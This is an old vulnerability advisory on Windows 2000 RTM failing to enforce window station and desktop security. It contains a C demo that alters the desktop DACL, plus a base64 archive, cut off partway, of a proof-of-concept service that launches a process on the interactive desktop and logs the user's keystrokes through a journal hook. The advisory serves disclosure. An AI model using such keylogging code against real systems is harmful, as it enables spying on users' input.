COMMAND
kernel
SYSTEMS AFFECTED
Win2000
PROBLEM
Keith Brown found following. He's been doing some research on the
Windows 2000 RTM bits, and he noticed an amazing difference
between Windows 2000 and Windows NT regarding window station and
desktop security. The basic idea is that the interactive user
should have a safe User32 environment and random daemon processes
(running under distinct accounts) should not be able to see or
touch windows created by the interactive user. This works great
in Windows NT 4, but for some reason window station security
doesn't appear to be enforced in Windows 2000 RTM (running the
Server version).
A very simple example that we can demonstrate in Windows NT 4 is
to modify the DACL on the interactive desktop so that it doesn't
allow you to create menus. If you run notepad.exe after making
this change, you'll see that it starts ok, but without a menubar.
On Windows 2000 RTM, you do not get this behavior.
Granted, this is a rather silly example. The more interesting
case is when a random daemon process is running (not even as
SYSTEM) in a non-interactive window station; it appears as though
it can now start processes and direct them to run in the
interactive window station (and thus do bad stuff like scrape the
user's screen). Keith reproduced this (getting a non-interactive
service to launch notepad in the interactive winstation); if you
want the code, please send him direct mail (KBrown@DEVELOP.COM)
or unmime mimed version below.
Given the way the new "runas" feature in Windows 2000 works,
considering that it doesn't bother modifying window station and
desktop DACLs, one would imagine that this feature would *break*
if MS started enforcing window station and desktop DACLs again.
Anyway, here's the sample program. What this program does is
modify the DACL on the interactive desktop to deny the well-known
SID INTERACTIVE the DESKTOP_CREATEMENU permission. After you run
this program successfully, just launch NOTEPAD.EXE and if Windows
2000 were doing access checks on window stations and desktops, it
would appear without a menu bar (this is the behavior on NT4).
What Keith saw on W2K RTM is that notepad can in fact still create
a menu bar. This is a simple symptom of a larger issue.
Here's the program. When you're done running this program, new
programs that are launched should not be able to create menus.
Run notepad to verify this (on Windows 2000 RTM, notepad will
have a menu bar - this is the bug). To restore the DACL on your
desktop, log out and log back in (WinLogon always resets the DACL
on the interactive window station and desktop when a new
interactive user logs in).
#define UNICODE
#include <windows.h>
#include <stdio.h>
// This program adds a single access-denied ACE
// to the current desktop, prohibiting the
// interactive user from creating menus.
// After running this program,
// run Notepad.exe and it should appear
// without a menu bar.
// This works on NT4, but on W2K RTM,
// notepad happily sports a menu bar.
void Err(const wchar_t* pszFcn,
DWORD err = GetLastError());
void main() {
// get the current desktop
// which should be Winsta0\default
// if you ran this interactively
HDESK hdesk =
GetThreadDesktop(GetCurrentThreadId());
if (!hdesk)
Err(L"GetThreadDesktop");
// get its DACL
BYTE sd[4096];
DWORD cbSD = sizeof sd;
SECURITY_INFORMATION si =
DACL_SECURITY_INFORMATION;
if (!GetUserObjectSecurity(
hdesk,
&si, sd, cbSD, &cbSD))
Err(L"GetUserObjectSecurity");
ACL* pdaclOld;
BOOL bPresent, bDefaulted;
if (!GetSecurityDescriptorDacl(sd,
&bPresent, &pdaclOld, &bDefaulted))
Err(L"GetSecurityDescriptorDacl");
// watch for NULL DACL (just being paranoid)
if (!pdaclOld) {
fwprintf(stderr, L"Unexpected NULL DACL\n");
exit(1);
}
// see how big the original DACL is
ACL_SIZE_INFORMATION sizeInfo;
if (!GetAclInformation(pdaclOld,
&sizeInfo, sizeof sizeInfo,
AclSizeInformation))
Err(L"GetAclInformation");
// allocate a new DACL with room for
// on additional ACE
const DWORD _maxSidSize = sizeof(SID) +
((SID_MAX_SUB_AUTHORITIES - 1) *
sizeof(DWORD));
const DWORD _maxVersion2AceSize =
sizeof(ACCESS_ALLOWED_ACE) - sizeof(DWORD)
+ _maxSidSize;
DWORD cbDacl = sizeInfo.AclBytesInUse +
_maxVersion2AceSize;
ACL* pdaclNew = (ACL*)LocalAlloc(GPTR, cbDacl);
if (!pdaclNew)
Err(L"LocalAlloc");
// this is the well-known INTERACTIVE SID
SID sid = {SID_REVISION, 1, SECURITY_NT_AUTHORITY,
SECURITY_INTERACTIVE_RID};
// build the new DACL
if (!InitializeAcl(pdaclNew, cbDacl, ACL_REVISION))
Err(L"InitializeAcl");
// a safe way to add a direct negative ACE is to
// add it at the very beginning of the ACL
if (!AddAccessDeniedAce(pdaclNew, ACL_REVISION,
DESKTOP_CREATEMENU, &sid))
Err(L"");
// copy all the old ACEs as well
for (DWORD i = 0; i < sizeInfo.AceCount; ++i) {
ACE_HEADER* pace;
if (!GetAce(pdaclOld, i, (void**)&pace))
Err(L"GetAce");
if (!AddAce(pdaclNew, ACL_REVISION, MAXDWORD,
pace, pace->AceSize))
Err(L"AddAce");
}
// build a security descriptor to hold the new DACL
SECURITY_DESCRIPTOR sdNew;
if (!InitializeSecurityDescriptor(&sdNew,
SECURITY_DESCRIPTOR_REVISION))
Err(L"InitializeSecurityDescriptor");
if (!SetSecurityDescriptorDacl(&sdNew,
TRUE, pdaclNew, FALSE))
Err(L"SetSecurityDescriptorDacl");
// apply the new DACL to the object
if (!SetUserObjectSecurity(hdesk, &si, &sdNew))
Err(L"SetUserObjectSecurity");
wprintf(L"Successfully added denied ACE\n");
wprintf(L"New programs should not be able\n");
wprintf(L"to create menu bars; try notepad.\n");
wprintf(L"To restore, log out and log back in.\n");
// clean up
LocalFree(pdaclNew);
CloseDesktop(hdesk);
}
// simple error handling routine, halts program
void Err(const wchar_t* pszFcn, DWORD err) {
wchar_t szMsg[512];
if (!FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM,
0, err, 0,
szMsg, sizeof szMsg / sizeof *szMsg, 0)) {
wsprintf(szMsg, L"Unknown Error: %x", err);
}
wchar_t sz[512];
wsprintf(sz, L"%s failed: %s", pszFcn, szMsg);
fwprintf(stderr, sz);
exit(1);
}
Keith got a sample of a service that you can run as a
distinguished principal that creates a second process on the
interactive desktop. The second process (running under the
daemon's credentials) successfully installs a journal hook and
prints out (to its interactive console) each journal message
(this includes information about which keys the interactive user
is pressing and in what order). This is pretty much the ultimate
demonstration of what can happen when window station and desktop
security isn't enforced. This vulnerability exists on Windows
2000 RTM. You can download the sample from:
http://www.develop.com/kbrown/w2k_winsta_bug.zip
Please read the README.TXT file included in the archive for
instructions on how to use the sample code. Here it is mimed
version:
---
Content-Type: application/octet-stream; name="w2k_win.zip"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="w2k_win.zip"
Content-MD5: QwS/HEt1UIc5xN+FZCvK9w==
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
